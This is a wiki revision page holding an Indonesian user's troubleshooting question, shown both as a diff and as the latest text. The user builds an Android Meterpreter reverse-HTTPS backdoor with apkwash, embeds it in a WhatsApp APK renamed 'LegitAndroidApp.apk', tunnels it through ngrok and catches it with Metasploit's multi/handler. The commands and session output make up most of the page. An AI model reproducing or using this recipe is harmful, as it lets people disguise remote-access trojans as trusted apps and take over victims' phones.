Difference between revisions of "MSF: ngrok"

From OnnoWiki
Jump to navigation Jump to search
(Created page with " pak saya kan mau coba metasploit + ngrok, + apkwash pertama saya make ngrok $ngrok tcp 1337 keluar nya tcp://2.tcp.ngrok.io:11394 terus saya make apkwash $apkwash -p an...")
 
 
Line 5: Line 5:
 
pertama saya make ngrok
 
pertama saya make ngrok
  
$ngrok tcp 1337
+
$ngrok tcp 1337
  
 
keluar nya tcp://2.tcp.ngrok.io:11394
 
keluar nya tcp://2.tcp.ngrok.io:11394
Line 11: Line 11:
 
terus saya make apkwash
 
terus saya make apkwash
  
$apkwash -p android/meterpreter/reverse_https LHOST=2.tcp.ngrok.io LPORT=11394 -o LegitAndroidApp.apk -x whatsapp.apk
+
apkwash -p android/meterpreter/reverse_https LHOST=2.tcp.ngrok.io LPORT=11394 -o LegitAndroidApp.apk -x whatsapp.apk
  
 
terus saya buka msfconsole
 
terus saya buka msfconsole
  
  
$msfconsole
+
msfconsole
$use exploit/multi/handler
+
  use exploit/multi/handler
$ set payload ndroid/meterpreter/reverse_https
+
  set payload ndroid/meterpreter/reverse_https
$ set lport 1337
+
  set lport 1337
$ set lhost 127.0.0.1 atau 2.tcp.ngrok.io
+
  set lhost 127.0.0.1 atau 2.tcp.ngrok.io
$ exploit
+
  exploit
  
 
nah kemudian saya kirim backdoor nya ke hp saya.. saya coba tp mesti gini , kenapa ya apakah ada yg salah ? please jawab:)
 
nah kemudian saya kirim backdoor nya ke hp saya.. saya coba tp mesti gini , kenapa ya apakah ada yg salah ? please jawab:)
  
*] Started reverse TCP handler on 127.0.0.1:1337  
+
*] Started reverse TCP handler on 127.0.0.1:1337  
[*] Sending stage (73808 bytes) to 127.0.0.1
+
[*] Sending stage (73808 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:1337 -> 127.0.0.1:36424) at 2020-08-07 00:45:11 +0700
+
[*] Meterpreter session 1 opened (127.0.0.1:1337 -> 127.0.0.1:36424) at 2020-08-07 00:45:11 +0700
[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: Died
+
[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: Died
[*] Sending stage (73808 bytes) to 127.0.0.1
+
[*] Sending stage (73808 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (127.0.0.1:1337 -> 127.0.0.1:36430) at 2020-08-07 00:46:19 +0700
+
[*] Meterpreter session 2 opened (127.0.0.1:1337 -> 127.0.0.1:36430) at 2020-08-07 00:46:19 +0700
[*] 127.0.0.1 - Meterpreter session 2 closed.  Reason: Died
+
[*] 127.0.0.1 - Meterpreter session 2 closed.  Reason: Died

Latest revision as of 12:26, 5 January 2021


pak saya kan mau coba metasploit + ngrok, + apkwash

pertama saya make ngrok

$ngrok tcp 1337

keluar nya tcp://2.tcp.ngrok.io:11394

terus saya make apkwash

apkwash -p android/meterpreter/reverse_https LHOST=2.tcp.ngrok.io LPORT=11394 -o LegitAndroidApp.apk -x whatsapp.apk

terus saya buka msfconsole


msfconsole
  use exploit/multi/handler
  set payload ndroid/meterpreter/reverse_https
  set lport 1337
  set lhost 127.0.0.1 atau 2.tcp.ngrok.io
  exploit

nah kemudian saya kirim backdoor nya ke hp saya.. saya coba tp mesti gini , kenapa ya apakah ada yg salah ? please jawab:)

*] Started reverse TCP handler on 127.0.0.1:1337 
[*] Sending stage (73808 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:1337 -> 127.0.0.1:36424) at 2020-08-07 00:45:11 +0700
[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: Died
[*] Sending stage (73808 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (127.0.0.1:1337 -> 127.0.0.1:36430) at 2020-08-07 00:46:19 +0700
[*] 127.0.0.1 - Meterpreter session 2 closed.  Reason: Died